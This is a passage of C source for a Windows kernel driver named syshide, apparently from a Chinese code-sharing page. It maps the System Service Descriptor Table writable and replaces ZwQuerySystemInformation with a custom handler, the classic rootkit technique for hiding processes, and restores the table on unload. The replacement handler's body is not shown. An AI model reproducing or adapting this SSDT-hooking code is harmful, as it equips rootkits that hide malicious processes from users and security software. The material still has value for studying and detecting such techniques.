📄 syshide.c
字号:
NTSTATUS ntStatus;
UNICODE_STRING deviceNameUnicodeString;
PDEVICE_EXTENSION deviceExtension;
UNICODE_STRING deviceLinkUnicodeString;
UNICODE_STRING DestinationString;
dprintf("syshide.SYS: entering DriverEntry\n");
//
// A real driver would:
//
// 1. Report it's resources (IoReportResourceUsage)
//
// 2. Attempt to locate the device(s) it supports
// 代码
// 保存原系统调用位置
// 映射我们的区域
g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
if(!g_pmdlSystemCall)
{
return STATUS_UNSUCCESSFUL;
}
MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
// 改变MDL的flags
g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
//在内存中索定,不让换出
g_MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
// 获取KeServiceDescriptorTable
RtlInitUnicodeString(&DestinationString, L"KeServiceDescriptorTable");
g_pKeServiceDescriptorTable = (unsigned long)MmGetSystemRoutineAddress(&DestinationString);
DbgPrint("g_pKeServiceDescriptorTable\t%.8X\n",g_pKeServiceDescriptorTable);
DbgPrint("KeServiceDescriptorTable\t%.8X\n",KeServiceDescriptorTable);
// 保存原始NtOpenProcess
g_pOriNtOpenProcess = (ZWOPENPROCESS)SYSTEMSERVICE(ZwOpenProcess);
g_pOriNtQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)SYSTEMSERVICE(ZwQuerySystemInformation);
DbgPrint("g_pOriNtOpenProcess\t%.8X\n",g_pOriNtOpenProcess);
DbgPrint("g_pOriNtQuerySystemInformation\t%.8X\n",g_pOriNtQuerySystemInformation);
//
// OK, we've claimed our resources & found our h/w, so create
// a device and initialize stuff...
//
RtlInitUnicodeString(&deviceNameUnicodeString, NT_DEVICE_NAME);
//
// Create an EXCLUSIVE device, i.e. only 1 thread at a time can send
// i/o requests.
//
ntStatus = IoCreateDevice(DriverObject, sizeof(DEVICE_EXTENSION),
&deviceNameUnicodeString, FILE_DEVICE_syshide,
0, TRUE, &deviceObject);
if ( NT_SUCCESS(ntStatus) )
{
deviceExtension = (PDEVICE_EXTENSION)deviceObject->DeviceExtension;
//
// Set up synchronization objects, state info,, etc.
//
//
// Create a symbolic link that Win32 apps can specify to gain access
// to this driver/device
//
RtlInitUnicodeString(&deviceLinkUnicodeString, DOS_DEVICE_NAME);
ntStatus = IoCreateSymbolicLink(&deviceLinkUnicodeString, &deviceNameUnicodeString);
if ( !NT_SUCCESS(ntStatus) )
{
dprintf("syshide.SYS: IoCreateSymbolicLink failed\n");
}
//
// Create dispatch points for device control, create, close.
//
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DrvDispatch;
DriverObject->DriverUnload = DrvUnload;
}
OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
_asm cli
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation))= NewZwQuerySystemInformation;
_asm sti
if ( !NT_SUCCESS(ntStatus) )
{
//
// Something went wrong, so clean up (free resources, etc.)
//
if (deviceObject) IoDeleteDevice(deviceObject);
}
return ntStatus;
}
/*++
Routine Description:
Process the IRPs sent to this device.
Arguments:
DeviceObject - pointer to a device object
Irp - pointer to an I/O Request Packet
Return Value:
--*/
NTSTATUS DrvDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
PIO_STACK_LOCATION irpStack;
PDEVICE_EXTENSION deviceExtension;
PVOID ioBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG ioControlCode;
NTSTATUS ntStatus;
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
//
// Get a pointer to the current location in the Irp. This is where
// the function codes and parameters are located.
//
irpStack = IoGetCurrentIrpStackLocation(Irp);
//
// Get a pointer to the device extension
//
deviceExtension = DeviceObject->DeviceExtension;
//
// Get the pointer to the input/output buffer and it's length
//
ioBuffer = Irp->AssociatedIrp.SystemBuffer;
inputBufferLength = irpStack->Parameters.DeviceIoControl.InputBufferLength;
outputBufferLength = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
switch (irpStack->MajorFunction)
{
case IRP_MJ_CREATE:
dprintf("syshide.SYS: IRP_MJ_CREATE\n");
break;
case IRP_MJ_CLOSE:
dprintf("syshide.SYS: IRP_MJ_CLOSE\n");
break;
case IRP_MJ_DEVICE_CONTROL:
dprintf("syshide.SYS: IRP_MJ_DEVICE_CONTROL\n");
ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;
switch (ioControlCode)
{
case IOCTL_syshide_HELLO:
{
//
// Some app is saying hello
//
break;
}
default:
Irp->IoStatus.Status = STATUS_INVALID_PARAMETER;
dprintf("syshide.SYS: unknown IRP_MJ_DEVICE_CONTROL\n");
break;
}
break;
}
//
// DON'T get cute and try to use the status field of
// the irp in the return status. That IRP IS GONE as
// soon as you call IoCompleteRequest.
//
ntStatus = Irp->IoStatus.Status;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
//
// We never have pending operation so always return the status code.
//
return ntStatus;
}
/*++
Routine Description:
Free all the allocated resources, etc.
Arguments:
DriverObject - pointer to a driver object
Return Value:
--*/
VOID DrvUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING deviceLinkUnicodeString;
//
// Free any resources
//
//
// Delete the symbolic link
//
_asm cli
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation;
_asm sti
RtlInitUnicodeString(&deviceLinkUnicodeString, DOS_DEVICE_NAME);
IoDeleteSymbolicLink(&deviceLinkUnicodeString);
//
// Delete the device object
//
IoDeleteDevice(DriverObject->DeviceObject);
dprintf("syshide.SYS: unloading\n");
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -